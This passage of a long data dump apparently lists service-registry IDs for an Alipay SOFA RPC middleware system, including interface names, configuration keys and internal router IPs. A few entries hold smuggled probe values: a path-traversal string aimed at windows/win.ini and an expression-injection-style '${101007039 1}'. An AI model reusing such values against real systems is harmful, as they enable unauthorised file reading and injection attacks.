acade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliminiabilityprod.facade.api.SolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icif.imemberprod.service.facade.api.ImemberUserCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.ServiceMetaAddNodesFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antgraphfeature.core.engine.repo.RepositoryUnifiedLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.ConditionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.prodquery.PQDRMConfig.sysEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clive.biz.cscc.websocket.WebSocketNotification:1.0:nativeWebSocketNotification@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:advanceExchangeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.schedule.rpc.service.SupplementRecordService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_BATCH_REFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.apshopcenter.ApscContentBlockUrlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.ExclusiveCreditMsgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.echox.drm.EchoxSpecialDrm.updateEchoxConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_aliinvoiceprod_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchishub.common.service.facade.api.assetdecision.mng.AssetDecisionMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyManagerFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_CP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.almcenter.service.facade.api.funduser.FundPredictDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.mgetRouterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeco.facade.initialverify.InitialVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.facade.api.FaultAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.admin.FileSourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.newEventServiceCreateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.biz.news.shared.datasync.subjectindex.BatchSubjectIndexService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.common.service.integration.tr.SdNamelistInternalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.tairWhiteListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.common.service.facade.order.OrderLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.userview:name=com.alipay.zcache.log.userview.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.comparacenter.common.service.facade.load.api.ComParaClientRegistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:sendSubmitMessagesNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.ProdDraftFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.pcinstprod_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csguide.service.facade.api.DecisionConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundMerchantTopUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecore.service.facade.RefundFacadeiii:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.ConditionServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minicore.common.service.facade.client.api.BundleInfoWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.common.service.facade.AppfuseConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.63.234.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileappconfig.common.service.facade.api.LangManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.consumecenter.common.service.facade.RecoverEventQueryFacade:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pushcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepGiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.admin.api.CommonAdminOperateRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.spi.callback.PaymentCallbackService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.msgbroker.CommentDeleteMsgProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.ScriptConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.VerifyIdentifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antsports.common.service.facade.UserTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.bumng.api.OperatorBumngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootRPCdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.echo:name=com.alipay.echo.platform.client.drm.EchoPlaybackConfigDrm.playbackStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:sensitiveInfoDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.mobilecashier.drmControl.dingWebHookUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smartsql.service.facade.service.SysConfigServerV2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileappcommon.common.service.facade.baas.IosResourceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.ConferAccountFundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finslip_finslipDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.123.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.253.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:filebridge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdataanalyser.common.service.facade.DataQueryForDapingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.bank.BankInstitutionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdpmng.facade.adapt.ImatchAdaptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:chair-react-webpack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.template.CheckListTemplateQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inshealthprod.facade.BonusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.kbjob.JobBizConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_ALI_TP_ANT_BENEFIT_LIFE_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.rpcLatency,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbreservationprod.common.service.facade.commonuniqueconstraint.CommonUniqueConstraintManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.comparacenter.common.service.facade.client.StdErrCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.assetflux.service.api.DepositBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cicada.plugin.common.service.facade.api.PluginSDKLogicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:xamvc4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.common.facade.treenode.service.PipelineTreeNodeOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilepayfront.service.facade.errplateform.MobilePayCommonErrorCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.22.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.settling.common.service.facade.ApplyFormFillStepQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.81.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.44.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jarvis.service.facade.api.user.DeptManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.content.api.ProductRecommendContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetdecision.common.service.facade.api.ConfigWithApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icashiercore.common.service.facade.api.CashierInfoExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.biz.service.gw.antsearch.api.AntSearchManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:wshopbffweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acpmpcore.common.service.facade.MilestoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.UserMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.IndustryPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.freeAmountConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprocess.sip.action.Action:1.0:taskRelievePunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@fpdecisionplatform#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","cn.com.antcloud.acmcscore.facade.TeamEffectivenessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.client.serivce.ExterfaceInvokeService:1.0:insautomarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-mobilerelationtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.rule.RuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antrecluse.facade.service.md.MasterDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpdcenter.facade.mng.FpcMngEnumSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:penetrateTransferTaskSplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.74.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_MOBILEAPPSETCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.budgetcore.common.service.facade.api.BudgetSubtractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.share.auto.daointerface.McenterSyncBatchDbaDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.NexusItemQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.finfodds.FinfoddsServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.platform.MarketingAudioFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.ItemQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_OPERATOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfcenter.common.service.facade.ApAccruedExpenseOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.AppServerOpsFacade:1.0:workload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.RecSwitcher.sceneIdMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.datapoint.LocalDataPointValidateService:1.0:securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:sofito@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.facade.service.FundProtocolMigrateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkinstportal.common.service.facade.report.api.GovernmentReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.pieceVersion.facade.PieceVersionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.processor.MktPlanProcess:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opinioncore.facade.analysisengine.service.OpinionMessageLabelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelink.cache.LinkInfoCacheClient:1.0:pushcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodeRouteQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:unibase_voucherTrialAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:cif@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmpcore.common.service.facade.MemoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmIndirectMerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accustomercore.common.service.facade.UCKernelTenantManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:${101007039 1}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.cif.UserAccountArQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_CATERING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ideploy.common.service.facade.config.ConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:DASSET@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacaptain.service.facade.DatacaptainCaseDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finpwm@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasaa.facade.asql.DasaaAsqlDDLDMLFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.op.OpBundleInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userpsycore.common.service.facade.api.UserTraitVisualFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.robot.MybankAdaRobotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.CfpSpecialEnforceWithdrawQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.common.service.ins.InsuranceInstitutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:tesdfsdf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:unitradeprodutc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.api.RemindSettingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intimateprod.common.service.facade.api.taskcenter.TaskPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.eventscript.api.EventScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.rec.facade.RecStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.myfavor.FavorServiceConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.fatigue.configure.FatigueApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:icsmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.EventBroadcastQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.ConsumeRecordSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_RDCP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.ext.DingDingAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1218_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.innertrans.facade.api.InnerRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.portrait.IdentityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ideprod.common.service.MetricFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.file.FileUploadOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifiedlimit.facade.manage.LimitDimValueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftMessageVisibleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.component.spi.common.ComponentMeteDataConsultCallbackFacade:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasaa.facade.asql.DasaaAsqlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbassetSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.leads.PoiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillBigDataCollectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.150.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.75.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanoperation.facade.certify.CertifySealManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.loadcontroller.common.facade.RealtimeMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.api.PcreditAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.LogServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.qc.QcCheckGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.monitor.DatasourceMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fcfeaturemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igfas.facade.api.HolidayCalendarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_ANTFOREST_TRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.logictable.PipelineLogicTableOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.lehua.LehuaStatusQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.task.api.TaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.productBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qm.mbt.facade.ClearingMessageRegisterCheckerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mrchmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:charityprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_PROMOCREATIVE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm